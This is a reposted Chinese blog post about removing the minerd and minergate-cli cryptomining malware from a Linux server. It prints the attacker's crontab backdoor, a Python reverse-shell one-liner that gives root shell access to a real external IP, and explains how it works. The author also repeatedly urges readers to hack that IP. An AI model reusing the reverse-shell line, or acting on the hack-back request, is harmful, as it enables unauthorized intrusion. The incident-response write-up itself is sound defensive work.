redis的漏洞讓公司的服務器中了挖礦的病毒，入侵者在服務器上留了后門。每次只是把進程殺殺，但是過段時間病毒又回來了，這個事情一直讓人頭疼。先是minerd的病毒入侵，后是minergate-cli入侵。當時以為是服務器的帳號密碼被泄漏了，然后對服務器登錄的ip一個個檢查，對操作的shell一個個核對，都沒有發現異常。這就奇怪了，不知道什么原因讓病毒一直入侵。還是minergate-cli這個病毒的運行方式讓我找到了問題的所在。以往的miner進程會讓cpu跑到1000%的狀態，kill的時候只用殺死一個進程就解決問題。后來的一個變種minergate-cli變花樣了，開多個進程，每個進程占50-100%的cpu，這樣干的目的就是讓新手一個個的輸入pid，非常耗時。正是這個現象讓我想起來用腳本殺進程，腳本殺起來是爽，執行一下minergate-cli進程全沒了，但是還是不夠爽，手動多累啊，每天還要上來看看，把腳本放到定時任務多好。就是這個啟發讓我找到問題的所在，入侵者在定時任務留下后門，定時的會向病毒的服務器發送socket，建立連接后對方的服務器就可以正常往你的服務器發送命令，而且賦予了root權限。這樣就可以解釋為什么病毒執行的時候都是用root帳戶運行的了。

　　以下是定時任務的后門，在/etc/crontab文件中：

----------------------------------------------------------------------------------------------------

*****?root ?/usr/bin/python -c ?'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("115.126.100.88",1050));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

-----------------------------------------------------------------------------------------------------

　　命令解釋：（python正向連接后門）新建一個socket，并將0、1、2分別代表系統的stdin、stdout、stderr（標準輸入、輸出、錯誤）重定向到socket中，然后開啟一個shell。這樣我們從socket中傳來的命令就會進入系統的標準輸入（就跟鍵盤輸入的效果一樣了），系統的輸出和錯誤就會重定向到socket中，被我們客戶端獲取。但這個彈shell腳本只能在linux下使用。

　　如果看不懂就用一句大白話解釋：對方電腦可以操作你的電腦，而且獲取了root權限！！！

　　如果你懂如何黑服務器，在你空閑之于幫我黑黑115.126.100.88這臺服務器！！！如果你懂如何黑服務器，在你空閑之于幫我黑黑115.126.100.88這臺服務器！！！如果你懂如何黑服務器，在你空閑之于幫我黑黑115.126.100.88這臺服務器！！！就是這臺服務器往你電腦上發布病毒的。

　　下面說說解決的步驟：

　　1、用root用戶寫一個腳本，比如在/lib下新建一個minerKiller.sh ? 加入以下內容：（僅限病毒存在docker容器中，別的情況不適用）

---------------------------------------------------------------------------------------------------------------

ps -ef|grep minergate-cli|grep -v grep|awk '{print "kill -9 " $2}'|sh
sleep 5
docker rm $(docker ps -a -q)
docker rmi minecoins/minergate-cli

-------------------------------------------------------------------------------------------------------------------

　　如果你是minerd病毒，把minergate-cli部分換成minerd即可。

　　2、修改權限并運行

　　chmod 700 /lib/minerKiller.sh

　　./lib/minerKiller.sh

　　3、清理定時任務

　　在以下三個地方查找：①/var/spool/cron/?②/etc/crontab③/etc/cron.d/ 。如果被別人加上惡心的定時任務，直接刪除掉。如果和我上面的一樣，那肯定是中招了。如果在修改文件過程中以root帳戶都無法修改，執行下面命令：?chattr –i ?文件路徑 ，比如我root帳戶不能修改/etc/crontab,執行 chattr -i /etc/crontab。然后root用戶就可以修改了。

　　4、如果不放心，可以將查殺病毒的腳本放進定時任務。

　　用root帳戶執行：crontab -e，進入文本后加入以下命令

-------------------------------------------------------------------------

30 0 * * * root?/lib/minerKiller.sh

-------------------------------------------------------------------------

　　系統就會定時執行剛剛寫的查殺病毒的腳本了。

?

　　

轉載于:https://www.cnblogs.com/runnerjack/p/7424785.html

總結

以上是生活随笔為你收集整理的linux查杀minergate-cli/minerd病毒的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。